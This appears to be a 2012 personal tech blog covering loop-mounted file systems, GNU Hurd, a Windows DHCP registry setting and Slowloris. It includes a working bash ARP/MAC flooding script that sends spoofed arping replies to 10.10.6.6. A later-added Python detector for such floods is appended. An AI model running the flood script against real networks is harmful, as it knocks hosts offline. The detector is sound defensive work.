Thursday, March 22, 2012

Virtual file system in Linux

If you want to carve a virtual partition out of an existing partition on a Linux system, a file-backed virtual file system (a loop-mounted image) is a nice little trick.

Step 1. Create an empty file:
[root@localhost ruckus]# cd /tmp/
[root@localhost tmp]# dd if=/dev/zero of=vs_file bs=1M count=512
512+0 records in
512+0 records out
536870912 bytes (537 MB) copied,0.767225 秒,700 MB/s
Step 2. Format the empty file as a virtual file system:
[root@localhost tmp]# mke2fs -j vs_file
mke2fs 1.39 (29-May-2006)
vs_file is not a block special device.
Proceed anyway? (y,n) y
Filesystem label=
OS type: Linux
Block size=1024 (log=0)
Fragment size=1024 (log=0)
131072 inodes, 524288 blocks
26214 blocks (5.00%) reserved for the super user
First data block=1
Maximum filesystem blocks=67633152
64 block groups
8192 blocks per group, 8192 fragments per group
2048 inodes per group
Superblock backups stored on blocks:
8193, 24577, 40961, 57345, 73729, 204801, 221185, 401409

Writing inode tables: done
Creating journal (16384 blocks): done
Writing superblocks and filesystem accounting information: done

This filesystem will be automatically checked every 21 mounts or
180 days, whichever comes first. Use tune2fs -c or -i to override.
Step 3. Mount the virtual file system the same way you mount an ordinary partition:
[root@localhost tmp]# mount -o loop /tmp/vs_file /mnt/vf/

Step 4. Verify:
[root@localhost tmp]# mount | grep vs_file
/tmp/vs_file on /mnt/vf type ext3 (rw,loop=/dev/loop0)
[root@localhost tmp]# cd /mnt/vf/
[root@localhost vf]# ls
lost+found
[root@localhost vf]# touch test
[root@localhost vf]# ls
lost+found test

GNU Hurd kernel

How ignorant of me: it turns out the kernel GNU originally planned to ship was not Linux but Hurd.
http://www.gnu.org/software/hurd/index.html
http://zh.wikipedia.org/wiki/Hurd
http://www.osnews.com/story/25724/Interview_Richard_Stallman

Monday, March 19, 2012

Configure Windows 7 to prefer DHCP unicast or broadcast responses

By default, Windows 7 Home edition prefers that the DHCP server's responses be sent as broadcast. This can of course be changed to unicast, and the method is simple: just change it through the registry.

Click Start->regedit->

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{GUID}

The GUID here is the one belonging to the corresponding NIC; Wireshark can help you look it up.

DhcpConnForceBroadcastFlag (0 or 1)

0 indicates unicast

1 indicates broadcast

Wednesday, March 07, 2012

Low bandwidth HTTP attack: Slowloris

Low bandwidth HTTP attacks go against the grain of traditional DoS: the approach is to bring down an HTTP server from a single machine using only a small amount of bandwidth. The best-known of these is Slowloris. Simply put, it works by sending the HTTP server incomplete HTTP requests and trying to keep them from being timed out by the server; the server's maximum number of open sockets fills up, and in the end the server can no longer serve other machines.

Please do not use this tool to attack others, thank you.

References:
http://ha.ckers.org/slowloris/
http://news.softpedia.com/news/Web-Servers-in-Danger-from-Low-Bandwidth-HTTP-DoS-114745.shtml
http://en.wikipedia.org/wiki/Slowloris
ARP/MAC address flooding attack

On BackTrack 5, combined with the arping test tool, I wrote a simple script to test whether a target host can hold up under an ARP/MAC address flooding attack. The script is as follows:
root@bt:~# cat bin/arp_cache.sh
#!/bin/bash

function arp_cache_attack
{
    while true;
    do
        # 100 ARP replies per round, each from a random source IP and one of ten MACs
        for((i=1;i<=100;i++))
        do
            mac=$(($RANDOM%10))
            number1=$(($RANDOM%254))
            number2=$(($RANDOM%254))
            number3=$(($RANDOM%254))
            number4=$(($RANDOM%254))
            arping -S "$number1.$number2.$number3.$number4" -s 00:00:00:00:$mac:$mac 10.10.6.6 -c 1 &
        done
        sleep 1
        # reap the background arping processes before starting the next round
        kill `ps aux | grep -i arping | grep -v grep | awk -F" " '{ print $2 }'` 1>/dev/null
        sync && echo "3" > /proc/sys/vm/drop_caches
        echo "re-generate"
    done
}

arp_cache_attack

Each round, this script generates 100 random fake IP and MAC address pairs and tries to fill up the ARP table of the target host (10.10.6.6 in the script above).

For personal research only; please do not use this script to test or attack other people's hosts.
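As the defender's counterpart to the script above, here is an added example (not from the original post) that parses a neighbour-table snapshot in `ip -4 neigh show` format from the target host and flags the flood pattern: many off-link source IPs all claiming the same MAC, and a table growing towards the kernel's gc_thresh3 limit. The sample table, the subnet 10.10.6.0/24 and the thresholds are constructed assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# One line of `ip -4 neigh show`; lladdr is absent for FAILED/INCOMPLETE entries.
NEIGH_RE = re.compile(r"^(?P<ip>\d+\.\d+\.\d+\.\d+) dev (?P<dev>\S+)"
                      r"(?: lladdr (?P<mac>[0-9A-Fa-f:]+))? +(?P<state>\S+)$")

# Constructed snapshot of a victim's table: two real hosts on 10.10.6.0/24, one
# unresolved entry, and six random off-link IPs all claiming the same spoofed MAC.
SAMPLE = """\
10.10.6.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
10.10.6.20 dev eth0 lladdr 00:11:22:33:44:66 STALE
10.10.6.99 dev eth0  FAILED
37.191.4.200 dev eth0 lladdr 00:00:00:00:03:03 STALE
102.9.77.13 dev eth0 lladdr 00:00:00:00:03:03 STALE
5.120.201.8 dev eth0 lladdr 00:00:00:00:03:03 STALE
211.64.7.140 dev eth0 lladdr 00:00:00:00:03:03 STALE
88.3.190.42 dev eth0 lladdr 00:00:00:00:03:03 STALE
149.250.16.77 dev eth0 lladdr 00:00:00:00:03:03 STALE
"""

def parse_neigh(text):
    """Return one dict (ip, dev, mac or None, state) per parsable line."""
    return [m.groupdict() for m in map(NEIGH_RE.match, text.splitlines()) if m]

def analyze(entries, subnet, max_ips_per_mac=5, gc_thresh3=1024):
    """Flag the signs of an ARP-cache flood in a neighbour-table snapshot.
    subnet      the interface's own prefix: on a single-subnet link, ARP from
                senders outside it has no legitimate source
    gc_thresh3  kernel cap on neighbour entries (net.ipv4.neigh.default.gc_thresh3,
                Linux default 1024); filling it is the flood's goal
    """
    net = ipaddress.ip_network(subnet)
    ips_per_mac = defaultdict(set)
    for e in entries:
        if e["mac"]:                       # skip unresolved entries
            ips_per_mac[e["mac"].lower()].add(e["ip"])
    return {
        "total": len(entries),
        "off_subnet": [e["ip"] for e in entries
                       if ipaddress.ip_address(e["ip"]) not in net],
        "suspicious_macs": {mac: len(ips) for mac, ips in ips_per_mac.items()
                            if len(ips) > max_ips_per_mac},
        "near_limit": len(entries) >= 0.8 * gc_thresh3,
    }

if __name__ == "__main__":
    print(analyze(parse_neigh(SAMPLE), "10.10.6.0/24"))
```

On a live host, feed it `ip -4 neigh show dev eth0` output and compare "total" against the current `sysctl net.ipv4.neigh.default.gc_thresh3`.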